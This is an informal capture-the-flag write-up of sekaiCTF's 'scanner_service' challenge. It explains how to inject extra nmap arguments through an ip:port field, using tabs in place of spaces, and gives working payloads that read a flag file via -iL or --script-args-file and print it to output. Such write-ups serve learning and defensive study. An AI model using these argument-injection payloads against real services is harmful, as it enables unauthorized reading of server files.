Shell

Nmap

For sekaiCTF's scanner_service challenge, the webpage passes your ip_address:port input to

nmap -p port ip_address

and then prints stdout(I tried doing stuff with -iL, but it errored out and sent it to stderr instead)

~~^someone solved it with iL though, I just don't remember how~~

0.0.0.0:1337\t-iL\t/flag-????????????????????????????????.txt\t-oN\t/dev/stdout

from https://discord.com/channels/1004529434092654663/1093762384012771391/1145794495334580234

Anyway, if you add stuff after the port, you can add cli arguments:

ex: 127.0.0.1:80 --abcd would be

nmap -p 80 --abcd 127.0.0.1

However, because the server escapes spaces(and a bunch of other characters) you can use tabs instead for whitespace

document.getElementById("yee").value = "127.0.0.1:80 --script http-favicon --script-args-file /flag.txt -dddddd".replaceAll(" ", "\t")

You can do the same thing with requests in python and make the post request yourself, but adding an id to the html element and pasting that into inspector works too

In this case, the flag file wasn't just flag.txt(I don't remember what it was) but it gave you the source for how it generated the filename, so you could just do flag-???.txt instead for however long the filename would be

I don't think it matters what script you put as long as it takes arguments

Also, you can repeat -v or -d to add more verbose/debug info

The output looked something like this:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-28 09:14 PDT
NSE: args = flag{yeeeeeeee},